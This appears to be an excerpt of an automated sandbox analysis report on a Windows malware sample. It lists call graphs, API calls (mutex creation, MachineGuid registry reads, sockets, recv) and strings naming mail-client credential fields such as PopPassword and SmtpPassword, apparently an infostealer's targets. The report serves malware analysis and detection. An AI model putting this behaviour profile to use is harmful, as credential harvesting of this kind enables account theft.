10679->10680 10680->10669 10721 413d97 10681->10721 10684 404056 5 API calls 10686 413cad 10684->10686 10685 413c9f 10685->10671 10686->10685 10687 405b6f 5 API calls 10686->10687 10689 413d10 10687->10689 10688 413d7b 10692 402bab 2 API calls 10688->10692 10689->10688 10690 403c62 3 API calls 10689->10690 10691 413d1f 10690->10691 10691->10688 10693 413d5a 10691->10693 10694 413d2c 10691->10694 10692->10685 10696 405b6f 5 API calls 10693->10696 10695 405dc5 3 API calls 10694->10695 10697 413d33 10695->10697 10698 413d55 10696->10698 10697->10698 10700 405b6f 5 API calls 10697->10700 10699 402bab 2 API calls 10698->10699 10699->10688 10701 413d48 10700->10701 10702 402bab 2 API calls 10701->10702 10702->10698 10704 4031e5 3 API calls 10703->10704 10705 4060dd 10704->10705 10706 406126 10705->10706 10707 4031e5 3 API calls 10705->10707 10706->10669 10710 40650a 10706->10710 10708 40610f 10707->10708 10784 40604f 10708->10784 10711 4060ac 3 API calls 10710->10711 10712 406519 10711->10712 10713 4031e5 3 API calls 10712->10713 10714 406529 10713->10714 10715 406599 10714->10715 10716 4031e5 3 API calls 10714->10716 10715->10678 10717 406544 10716->10717 10718 40657f 10717->10718 10720 4031e5 3 API calls 10717->10720 10719 403c40 3 API calls 10718->10719 10719->10715 10720->10718 10722 413da0 10721->10722 10725 413c96 10721->10725 10727 4065a2 10722->10727 10725->10684 10725->10685 10726 405dc5 3 API calls 10726->10725 10742 404a52 10727->10742 10729 406638 10729->10725 10729->10726 10730 4065c0 10730->10729 10754 40393f 10730->10754 10733 406631 10734 402bab 2 API calls 10733->10734 10734->10729 10735 4059d8 3 API calls 10736 4065e9 10735->10736 10738 402b7c 2 API calls 10736->10738 10741 40662a 10736->10741 10737 402bab 2 API calls 10737->10733 10739 4065f8 10738->10739 10740 402bab 2 API calls 10739->10740 10740->10741 10741->10737 10743 402b7c 2 API calls 10742->10743 10745 404a65 10743->10745 10744 404ac6 10744->10730 10745->10744 10746 4031e5 3 API calls 10745->10746 10747 404a8a RegOpenKeyExA 10746->10747 10748 404aa0 10747->10748 10749 404aca 10747->10749 10750 4031e5 3 API calls 10748->10750 10751 402bab 2 API calls 10749->10751 10752 404ab1 RegQueryValueExA 10750->10752 10751->10744 10753 404a39 4 API calls 10752->10753 10753->10744 10761 403843 10754->10761 10757 403969 10757->10733 10757->10735 10759 403961 10760 402bab 2 API calls 10759->10760 10760->10757 10762 403861 10761->10762 10763 402b7c 2 API calls 10762->10763 10765 403875 10763->10765 10764 403923 10764->10757 10780 403aef 10764->10780 10765->10764 10766 4031e5 3 API calls 10765->10766 10767 40389b 10766->10767 10767->10764 10768 4031e5 3 API calls 10767->10768 10769 4038c5 10768->10769 10770 40392a 10769->10770 10772 403666 3 API calls 10769->10772 10771 403649 3 API calls 10770->10771 10771->10764 10773 4038e7 10772->10773 10773->10770 10774 4031e5 3 API calls 10773->10774 10775 403901 10774->10775 10775->10770 10776 403911 10775->10776 10777 40362f 3 API calls 10776->10777 10778 403919 10777->10778 10779 403649 3 API calls 10778->10779 10779->10764 10781 403afc 10780->10781 10782 402b7c 2 API calls 10781->10782 10783 403b16 10782->10783 10783->10759 10785 4031e5 3 API calls 10784->10785 10786 406062 10785->10786 10786->10706

                              Control-flow Graph

                              APIs
                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                              • GetLastError.KERNEL32 ref: 0041399E
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$CreateLastModeMutex
                              • String ID:
                              • API String ID: 3448925889-0
                              • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                              • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                              • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3676486918-0
                              • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                              • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 82 404df3-404e16 WSAStartup
                              APIs
                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                              • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                              • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                              • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                              APIs
                              • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                              • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                              • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                              • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                              APIs
                              • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                              • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                              • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                              • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                              APIs
                              • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close
                              • String ID:
                              • API String ID: 3535843008-0
                              • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                              • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                              • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                              • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 0040438F
                              • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                              • VariantInit.OLEAUT32(?), ref: 004043C4
                              • SysAllocString.OLEAUT32(?), ref: 004043CD
                              • VariantInit.OLEAUT32(?), ref: 00404414
                              • SysAllocString.OLEAUT32(?), ref: 00404419
                              • VariantInit.OLEAUT32(?), ref: 00404431
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: InitVariant$AllocString$CreateInitializeInstance
                              • String ID:
                              • API String ID: 1312198159-0
                              • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                              • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                              • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                              • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                              • API String ID: 0-2111798378
                              • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                              • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                              • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                              • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                              • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                              APIs
                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: recv
                              • String ID:
                              • API String ID: 1507349165-0
                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                              • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                              • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                              • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: _wmemset$ErrorLast
                              • String ID: IDA$IDA
                              • API String ID: 887189805-2020647798
                              • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                              • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                              • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                              • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                              APIs
                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                              • socket.WS2_32(?,?,?), ref: 00404E7A
                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                              Memory Dump Source
                              • Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd
                              Yara matches
                              Similarity
                              • API ID: freeaddrinfogetaddrinfosocket
                              • String ID:
                              • API String ID: 2479546573-0
                              • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                              • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                              • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                              • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98